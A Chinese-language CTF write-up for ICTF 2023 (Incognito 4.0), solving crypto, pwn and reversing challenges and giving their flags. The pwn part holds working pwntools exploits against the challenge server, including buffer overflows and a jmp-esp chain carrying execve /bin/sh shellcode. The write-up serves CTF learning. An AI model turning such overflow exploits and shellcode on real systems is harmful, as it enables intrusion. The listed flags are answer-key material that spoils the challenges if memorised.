代码收藏家 【ICTF 2023:Incognito 4.0】
一周4赛,有点赶不过来呀。
只做了一点,队长组队的时候
(每次都中间断掉,一大堆写的都得从头来)
Crypto
Ancient
这样的第2次见,第1次就不会,这回看了队友wp终于知道是怎么加密的了
每个符号可以表示4位10进制数。
原题
这个手工搓出来
bytes([105,99,116,102,123,48,108,100,95,109,48,110,107,95,49,57,48,100,101,49,99,51,125])
#b'ictf{0ld_m0nk_190de1c3}'原来不会的那个题是这样
这个4位连一起组成个大数字(每个符号4位前补0)再long_to_bytes
c2
这个就简单了,就是个替换
#flag = "" #redacted
#flag = flag[:15]
def func(f, i):
if i<5:
out = ord(f) ^ 0x76 ^ 0xAD
var1 = (out & 0xAA) >> 1
var2 = 2 * out & 0xAA
return var1 | var2
elif i>=5 and i<10:
out = ord(f) ^ 0x76 ^ 0xBE
var1 = (out & 0xCC) >> 2
var2 = 4 * out & 0xCC
return var1 | var2
else:
out = ord(f) ^ 0x76 ^ 0xEF
var1 = (out & 0xF0) >> 4
var2 = 16 * out & 0xF0
return var1 | var2
res = ''
for i in range(15):
res += chr(func(flag[i], i))
f = open('result','w')
f.write(res)
f.close()
只是这出来的比128大,存的时候存成utf8需要处理一下
flag = ''
res = open('result','rb').read()
i=0
rr = []
while i<len(res):
if res[i]>=0xc0:
rr.append( ((res[i]&0x1f)<<6)|(res[i+1]&0x3f) )
i+=2
else:
rr.append(res[i])
i+=1
print(hex(rr[-1]))
#print(len(res))
res = [0xd3, 0xd3, 0x7e, 0xd4, 0xd7, 0xa3, 0xf6, 0xae, 0xa3, 0xf6, 0x8f, 0xbf, 0xda, 0xda, 0xaa]
for i in range(15):
for v in range(0x20, 0x100):
if func(chr(v), i) == rr[i]:
print(i,v)
flag+=chr(v)
#break
print(flag)
#88f30d1cd1ab443
#ictf{88f30d1cd1ab443}PWN
babyFlow
溢出
int __cdecl main(int argc, const char **argv, const char **envp)
{
char s[80]; // [esp+0h] [ebp-58h] BYREF
int *p_argc; // [esp+50h] [ebp-8h]
p_argc = &argc;
puts("can you pass me?");
gets(s);
vulnerable_function(s);
return 0;
}
char *__cdecl vulnerable_function(char *src)
{
char dest[16]; // [esp+4h] [ebp-14h] BYREF
return strcpy(dest, src);
}这个需要到子函数里去溢出
from pwn import *
p = remote('143.198.219.171', 5000)
context(arch='i386', log_level='debug')
pay = b'A'*(0x14+4)+p32(0x80491fc)*2 #在vulnerable_function溢出
p.sendlineafter(b"can you pass me?\n", pay)
p.interactive()
#cat flag;
#ictf{bf930bcd-6c10-4c05-bdd8-435db4b50cdb}Gainme
题目里有4个比较函数,手工得到结果,输入即可
from pwn import *
from Crypto.Util.number import long_to_bytes
p = remote('143.198.219.171', 5003)
context(arch='i386', log_level='debug')
v1 = b'ICTF4'
v2 = b'dasDASQWgjtrkodsc'
v3 = p32(0xDEADBEEF)
v4 = b'1'
p.sendlineafter(b':',v1)
p.sendlineafter(b':',v2)
p.sendlineafter(b':',v3)
p.sendlineafter(b':',v4)
p.recv()
p.interactive()
#ictf{g@inm3-sf23f-4fd2150cd33db}passme
这个不会,问的群里Sh33p 给出两个WP
程序很简单,看上去是个比较成功即可
int __cdecl main(int argc, const char **argv, const char **envp)
{
char s[64]; // [esp+0h] [ebp-4Ch] BYREF
float v5; // [esp+40h] [ebp-Ch]
int *p_argc; // [esp+44h] [ebp-8h]
p_argc = &argc;
v5 = 0.0;
puts("Enter your name: ");
gets(s);
if ( 17.022023 == v5 )
print_flag();
else
puts("._.");
return 0;
}其实不是,因为v5是float类型,17.022023是double类型,比较时到转成double,所以结果只能转成17.022022或17.022024
溢出的话有个问题
.text:080492FB 83 C4 10 add esp, 10h
.text:080492FB
.text:080492FE
.text:080492FE loc_80492FE: ; CODE XREF: main+61↑j
.text:080492FE B8 00 00 00 00 mov eax, 0
.text:08049303 8D 65 F8 lea esp, [ebp-8]
.text:08049306 59 pop ecx
.text:08049307 5B pop ebx
.text:08049308 5D pop ebp
.text:08049309 8D 61 FC lea esp, [ecx-4]
.text:0804930C C3 retn
.text:0804930C ; } // starts at 8049287这里会执行ecx-4,看了WP明白了,这里虽然无法指定ecx但gets最后会加个\0,用这个\0覆盖ecx的尾字节,使指针上移。这伸直由于s的位置很长,放满print_flag大概率命中。
另一种在里边放满ret+jmp_esp+shellcode,只要上移后的位置命中ret的位置就可以滑到shellcode。
from pwn import *
elf = context.binary = ELF('passme',checksec=False)
context.log_level = "CRITICAL"
payload = p32(elf.sym.print_flag)*17
while True:
#p = elf.process()
p = remote('143.198.219.171', 5001)
p.sendline(payload)
is_flag = p.recv()
if b'ictf{' in is_flag:
print(is_flag)
else:
passfrom pwn import *
ret = 0x0804900e # ret
jmp_esp = 0x080490fb # push esp ; mov ebx, dword ptr [esp] ; ret
while True:
# s = process('./passme')
s = remote('143.198.219.171', 5001)
chain = flat(
jmp_esp,
b'\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' # shellcode
)
rem = (68 - len(chain)) // 4
stage1 = p32(ret) * rem
stage1 += chain
s.sendline(stage1)
try:
s.recv(timeout=0.5)
s.recv(timeout=0.5)
except:
s.close()
continue
s.interactive()
breakRev
Meow
原码能看到,只是字符中间加\x00
ictf{easiest_challenge_of_them_all}rev_this
异或爆破
from pwn import p64,xor
a = [0x6071B14091B0C06,0x70806031C1C061C,0xA0B1D0E0716031B,0x41C0E1B190A1D1D]
a = b''.join([p64(v) for v in a])
for i in range(0x100):
print(xor(bytes([i]), a))
#ictf{thisisslightlyharderrevtask}AnotherRev
一个很长的运算,用z3解决
from z3 import *
#v = [BitVec(f'v_{i}', 8) for i in range(43)]
v = [Int(f'v_{i}') for i in range(43)]
s = Solver()
for i in range(43):
s.add(v[i]>0x20)
s.add(v[i]<0x7f)
s.add( v[0-0x40+0x59] + v[0-0x40+0x68] == 109)
s.add( v[0-0x40+0x59]
+ v[0-0x40+0x5F]
+ v[0-0x40+0x58]
+ v[0-0x40+0x50]
+ v[0-0x40+0x5F]
+ v[0-0x40+0x65]
+ v[0-0x40+0x62]
+ v[0-0x40+0x49]
+ v[0-0x40+0x65]
+ v[0-0x40+0x68] == 706 )
s.add ( v[0-0x40+0x65]
+ v[0-0x40+0x55]
+ v[0-0x40+0x58]
+ v[0-0x40+0x55]
+ v[0-0x40+0x51]
+ v[0-0x40+0x60]
+ v[0-0x40+0x45]
+ v[0-0x40+0x48]
+ v[0-0x40+0x4B]
+ v[0-0x40+0x45]
+ v[0-0x40+0x53] == 764 )
s.add ( v[0-0x40+0x54]
+ v[0]
+ v[0-0x40+0x43]
+ v[0-0x40+0x69]
+ v[0-0x40+0x68]
+ v[0-0x40+0x41]
+ v[0-0x40+0x58]
+ v[0-0x40+0x68]
+ v[0-0x40+0x42]
+ v[0-0x40+0x5A]
+ v[0-0x40+0x4D]
+ v[0-0x40+0x5F]
+ v[0-0x40+0x55]
+ v[0-0x40+0x55]
+ v[0-0x40+0x41]
+ v[0-0x40+0x56] == 1395 )
s.add ( v[0-0x40+0x58]
+ v[0-0x40+0x47]
+ v[0-0x40+0x4D]
+ v[0-0x40+0x5F]
+ v[0-0x40+0x61]
+ v[0-0x40+0x4E]
+ v[0-0x40+0x5E]
+ v[0-0x40+0x59]
+ v[0-0x40+0x4A]
+ v[0-0x40+0x62]
+ v[0-0x40+0x57] == 753 )
s.add ( v[0-0x40+0x41] + v[0-0x40+0x51] + v[0-0x40+0x47] + v[0-0x40+0x45] == 261 )
s.add ( v[0-0x40+0x48]
+ v[0-0x40+0x58]
+ v[0-0x40+0x5F]
+ v[0-0x40+0x59]
+ v[0-0x40+0x4A]
+ v[0-0x40+0x66]
+ v[0-0x40+0x5D]
+ v[0-0x40+0x5D]
+ v[0-0x40+0x4C]
+ v[0-0x40+0x55] == 666 )
s.add ( v[0-0x40+0x4E] + v[0-0x40+0x66] + v[0-0x40+0x55] == 300 )
s.add ( v[0-0x40+0x55]
+ v[0-0x40+0x60]
+ v[0-0x40+0x68]
+ v[0-0x40+0x63]
+ v[0-0x40+0x5F]
+ v[0-0x40+0x57]
+ v[0-0x40+0x5C]
+ v[0-0x40+0x47]
+ v[0-0x40+0x41]
+ v[0-0x40+0x48]
+ v[0-0x40+0x4D]
+ v[0-0x40+0x60]
+ v[0-0x40+0x5D]
+ v[0-0x40+0x59]
+ v[0-0x40+0x44] == 933 )
s.add ( v[0-0x40+0x64]
+ v[0-0x40+0x4C]
+ v[0-0x40+0x61]
+ v[0-0x40+0x68]
+ v[0-0x40+0x54]
+ v[0-0x40+0x56]
+ v[0-0x40+0x45]
+ v[0-0x40+0x5A]
+ v[0-0x40+0x60]
+ v[0-0x40+0x5F]
+ v[0-0x40+0x62]
+ v[0-0x40+0x42]
+ v[0-0x40+0x48]
+ v[0-0x40+0x67]
+ v[0-0x40+0x52]
+ v[0-0x40+0x55] == 1168 )
s.add ( v[0-0x40+0x56]
+ v[0-0x40+0x57]
+ v[0-0x40+0x5C]
+ v[0-0x40+0x42]
+ v[0-0x40+0x58]
+ v[0-0x40+0x69]
+ v[0-0x40+0x69]
+ v[0-0x40+0x62]
+ v[0-0x40+0x69]
+ v[0-0x40+0x5B]
+ v[0-0x40+0x54]
+ v[0-0x40+0x5C]
+ v[0-0x40+0x53]
+ v[0-0x40+0x55]
+ v[0-0x40+0x49]
+ v[0-0x40+0x50]
+ v[0-0x40+0x5E] == 1375 )
s.add ( v[0-0x40+0x63] + v[0-0x40+0x52] + v[0-0x40+0x59] + v[0-0x40+0x5D] + v[0-0x40+0x66] + v[0-0x40+0x53] + v[0-0x40+0x5E] == 409 )
s.add ( v[0-0x40+0x66]
+ v[0-0x40+0x42]
+ v[0-0x40+0x60]
+ v[0-0x40+0x50]
+ v[0-0x40+0x59]
+ v[0-0x40+0x4B]
+ v[0-0x40+0x50]
+ v[0-0x40+0x5C]
+ v[0]
+ v[0-0x40+0x5B]
+ v[0-0x40+0x5C] == 765 )
s.add ( v[0-0x40+0x54]
+ v[0-0x40+0x58]
+ v[0-0x40+0x52]
+ v[0-0x40+0x58]
+ v[0-0x40+0x59]
+ v[0-0x40+0x5C]
+ v[0-0x40+0x66]
+ v[0-0x40+0x44]
+ v[0-0x40+0x4D]
+ v[0-0x40+0x66]
+ v[0-0x40+0x5B]
+ v[0-0x40+0x57] == 902 )
s.add ( v[0-0x40+0x44] + v[0-0x40+0x68] == 178 )
s.add ( v[0-0x40+0x5B]
+ v[0-0x40+0x5D]
+ v[0-0x40+0x59]
+ v[0-0x40+0x65]
+ v[0-0x40+0x57]
+ v[0-0x40+0x5F]
+ v[0-0x40+0x4E]
+ v[0-0x40+0x4E]
+ v[0-0x40+0x4E]
+ v[0-0x40+0x5F]
+ v[0-0x40+0x5A]
+ v[0-0x40+0x4A]
+ v[0-0x40+0x4C]
+ v[0-0x40+0x50]
+ v[0-0x40+0x61]
+ v[0-0x40+0x43]
+ v[0-0x40+0x5F]
+ v[0-0x40+0x5B]
+ v[0-0x40+0x41]
+ v[0-0x40+0x5F] == 1513 )
s.add ( v[0-0x40+0x46] + v[0-0x40+0x4A] + v[0-0x40+0x68] == 165 )
s.add ( v[0-0x40+0x51]
+ v[0-0x40+0x41]
+ v[0-0x40+0x68]
+ v[0-0x40+0x62]
+ v[0-0x40+0x48]
+ v[0-0x40+0x4B]
+ v[0-0x40+0x65]
+ v[0-0x40+0x50]
+ v[0-0x40+0x4D]
+ v[0-0x40+0x4A] == 653 )
s.add ( v[0-0x40+0x67]
+ v[0-0x40+0x5E]
+ v[0-0x40+0x44]
+ v[0-0x40+0x56]
+ v[0-0x40+0x47]
+ v[0-0x40+0x5D]
+ v[0-0x40+0x57]
+ v[0-0x40+0x58]
+ v[0-0x40+0x64]
+ v[0-0x40+0x5D]
+ v[0-0x40+0x60]
+ v[0-0x40+0x5C]
+ v[0-0x40+0x49]
+ v[0-0x40+0x44]
+ v[0-0x40+0x68]
+ v[0-0x40+0x4C]
+ v[0-0x40+0x68]
+ v[0-0x40+0x53]
+ v[0-0x40+0x63] == 1266 )
s.add ( v[0-0x40+0x5C] + v[0-0x40+0x66] + v[0-0x40+0x55] + v[0-0x40+0x66] + v[0-0x40+0x5A] + v[0-0x40+0x58] + v[0-0x40+0x42] + v[0-0x40+0x60] == 711 )
s.add ( v[0-0x40+0x67]
+ v[0-0x40+0x41]
+ v[0-0x40+0x4B]
+ v[0-0x40+0x49]
+ v[0-0x40+0x44]
+ v[0-0x40+0x4F]
+ v[0-0x40+0x41]
+ v[0-0x40+0x49]
+ v[0-0x40+0x63]
+ v[0-0x40+0x55]
+ v[0-0x40+0x53]
+ v[0-0x40+0x59]
+ v[0-0x40+0x57]
+ v[0-0x40+0x68]
+ v[0]
+ v[0-0x40+0x53]
+ v[0-0x40+0x67] == 1294 )
s.add ( v[0-0x40+0x44]
+ v[0-0x40+0x5A]
+ v[0-0x40+0x41]
+ v[0-0x40+0x49]
+ v[0-0x40+0x54]
+ v[0-0x40+0x54]
+ v[0-0x40+0x52]
+ v[0-0x40+0x65]
+ v[0-0x40+0x59]
+ v[0-0x40+0x4F]
+ v[0-0x40+0x65]
+ v[0-0x40+0x48]
+ v[0-0x40+0x4F]
+ v[0-0x40+0x42]
+ v[0-0x40+0x5C]
+ v[0-0x40+0x4A]
+ v[0-0x40+0x63]
+ v[0-0x40+0x68]
+ v[0-0x40+0x69] == 1485 )
s.add ( v[0-0x40+0x5E] + v[0-0x40+0x50] == 100 )
s.add ( v[0-0x40+0x56]
+ v[0-0x40+0x4D]
+ v[0-0x40+0x45]
+ v[0-0x40+0x69]
+ v[0-0x40+0x63]
+ v[0-0x40+0x50]
+ v[0-0x40+0x57]
+ v[0-0x40+0x47]
+ v[0]
+ v[0-0x40+0x4F]
+ v[0-0x40+0x46]
+ v[0-0x40+0x45]
+ v[0-0x40+0x4F] == 945 )
s.add ( v[0-0x40+0x4C]
+ v[0]
+ v[0-0x40+0x67]
+ v[0-0x40+0x56]
+ v[0-0x40+0x52]
+ v[0-0x40+0x60]
+ v[0-0x40+0x43]
+ v[0]
+ v[0-0x40+0x41]
+ v[0-0x40+0x64]
+ v[0-0x40+0x58]
+ v[0-0x40+0x59]
+ v[0-0x40+0x56]
+ v[0-0x40+0x61]
+ v[0-0x40+0x48]
+ v[0-0x40+0x44] == 1327 )
s.add ( v[0-0x40+0x5E]
+ v[0-0x40+0x67]
+ v[0-0x40+0x57]
+ v[0-0x40+0x4C]
+ v[0-0x40+0x69]
+ v[0-0x40+0x5B]
+ v[0-0x40+0x56]
+ v[0-0x40+0x4C]
+ v[0-0x40+0x47]
+ v[0-0x40+0x42]
+ v[0-0x40+0x46]
+ v[0-0x40+0x4D]
+ v[0-0x40+0x42]
+ v[0-0x40+0x4E]
+ v[0-0x40+0x48]
+ v[0-0x40+0x57]
+ 2 * v[0-0x40+0x59]
+ v[0-0x40+0x68] == 1370 )
s.add ( v[0-0x40+0x55] + v[0-0x40+0x5D] + v[0-0x40+0x42] + v[0-0x40+0x54] + v[0-0x40+0x5E] + v[0-0x40+0x68] == 426 )
s.add ( v[0-0x40+0x4A]
+ v[0-0x40+0x63]
+ v[0-0x40+0x52]
+ v[0-0x40+0x4F]
+ v[0-0x40+0x47]
+ v[0-0x40+0x5B]
+ v[0-0x40+0x53]
+ v[0-0x40+0x4C]
+ v[0-0x40+0x4B]
+ v[0-0x40+0x49]
+ v[0-0x40+0x55]
+ v[0-0x40+0x68]
+ v[0-0x40+0x43]
+ v[0-0x40+0x66]
+ v[0-0x40+0x43]
+ v[0-0x40+0x55]
+ v[0-0x40+0x50]
+ v[0-0x40+0x5A] == 1329 )
s.add ( v[0-0x40+0x46]
+ v[0-0x40+0x67]
+ v[0]
+ v[0-0x40+0x41]
+ v[0-0x40+0x53]
+ v[0-0x40+0x62]
+ v[0-0x40+0x56]
+ v[0-0x40+0x4D]
+ v[0-0x40+0x4E]
+ v[0-0x40+0x69]
+ v[0-0x40+0x65]
+ v[0-0x40+0x44]
+ v[0-0x40+0x65] == 1199 )
s.add ( v[0-0x40+0x53]
+ v[0-0x40+0x4C]
+ v[0-0x40+0x4A]
+ v[0-0x40+0x5A]
+ v[0-0x40+0x4B]
+ v[0-0x40+0x5B]
+ v[0-0x40+0x5C]
+ v[0-0x40+0x46]
+ v[0-0x40+0x62]
+ v[0-0x40+0x4E]
+ v[0-0x40+0x44]
+ v[0-0x40+0x46]
+ v[0-0x40+0x4C]
+ v[0]
+ v[0-0x40+0x5B]
+ v[0-0x40+0x57]
+ v[0-0x40+0x46]
+ v[0-0x40+0x69]
+ v[0-0x40+0x43] == 1470 )
s.add ( v[0-0x40+0x43] + v[0-0x40+0x50] + v[0-0x40+0x4A] == 206 )
s.add ( v[0-0x40+0x5D] + v[0-0x40+0x61] + v[0-0x40+0x68] + v[0-0x40+0x60] + v[0-0x40+0x5B] + v[0-0x40+0x4C] + v[0-0x40+0x47] == 470 )
s.add ( v[0-0x40+0x63]
+ v[0-0x40+0x50]
+ v[0-0x40+0x56]
+ v[0-0x40+0x60]
+ v[0-0x40+0x60]
+ v[0-0x40+0x51]
+ v[0-0x40+0x5D]
+ v[0-0x40+0x45]
+ v[0-0x40+0x42]
+ v[0-0x40+0x4A]
+ v[0-0x40+0x53]
+ v[0-0x40+0x44]
+ v[0-0x40+0x56]
+ v[0-0x40+0x56]
+ v[0-0x40+0x54]
+ v[0-0x40+0x50]
+ v[0-0x40+0x62]
+ v[0-0x40+0x4C]
+ v[0-0x40+0x53] == 1302 )
s.add ( v[0-0x40+0x69]
+ v[0-0x40+0x45]
+ v[0-0x40+0x4E]
+ v[0-0x40+0x5F]
+ v[0-0x40+0x65]
+ v[0-0x40+0x49]
+ v[0-0x40+0x67]
+ v[0-0x40+0x5B]
+ v[0-0x40+0x4A]
+ v[0-0x40+0x62]
+ v[0-0x40+0x62] == 936 )
s.add ( v[0-0x40+0x45] + v[0-0x40+0x49] + v[0-0x40+0x44] == 234 )
s.add ( v[0-0x40+0x41]
+ v[0-0x40+0x62]
+ v[0-0x40+0x65]
+ v[0-0x40+0x67]
+ v[0-0x40+0x42]
+ v[0-0x40+0x52]
+ v[0-0x40+0x60]
+ v[0-0x40+0x68]
+ v[0-0x40+0x5A]
+ v[0-0x40+0x43]
+ v[0-0x40+0x5F]
+ v[0-0x40+0x61]
+ v[0-0x40+0x61] == 1116 )
s.add ( v[0-0x40+0x49]
+ v[0-0x40+0x4D]
+ v[0-0x40+0x50]
+ v[0-0x40+0x41]
+ v[0-0x40+0x4F]
+ v[0-0x40+0x5D]
+ v[0-0x40+0x44]
+ v[0-0x40+0x56]
+ v[0-0x40+0x43]
+ v[0-0x40+0x4B] == 777 )
s.add ( v[0-0x40+0x5C] + v[0-0x40+0x67] + v[0-0x40+0x60] + v[0-0x40+0x62] + v[0-0x40+0x47] + v[0-0x40+0x52] == 394 )
s.add ( v[0-0x40+0x5E]
+ v[0-0x40+0x4D]
+ v[0-0x40+0x48]
+ v[0-0x40+0x58]
+ v[0-0x40+0x53]
+ v[0-0x40+0x5F]
+ v[0-0x40+0x50]
+ v[0-0x40+0x46]
+ v[0-0x40+0x4D]
+ v[0-0x40+0x5E]
+ v[0-0x40+0x5D]
+ v[0] == 705 )
s.add ( v[0-0x40+0x41] + v[0-0x40+0x4E] == 200 )
s.add ( v[0-0x40+0x4C]
+ v[0-0x40+0x52]
+ v[0-0x40+0x45]
+ v[0-0x40+0x51]
+ v[0-0x40+0x5D]
+ v[0-0x40+0x65]
+ v[0-0x40+0x4D]
+ v[0-0x40+0x61]
+ v[0-0x40+0x65]
+ v[0-0x40+0x58]
+ v[0-0x40+0x63]
+ v[0-0x40+0x5C]
+ v[0-0x40+0x62]
+ v[0-0x40+0x66]
+ v[0-0x40+0x61]
+ v[0] == 1198 )
s.add ( v[0-0x40+0x4E] + v[0-0x40+0x64] + v[0-0x40+0x4C] + v[0-0x40+0x4D] + v[0-0x40+0x54] == 295 )
if s.check() == sat:
d = s.model()
f = ''
for i in range(43):
f+= chr(d[v[i]].as_long())
print(f)
#ictf{86947833-ef01-42cb-a6fe-6414da40edb7}!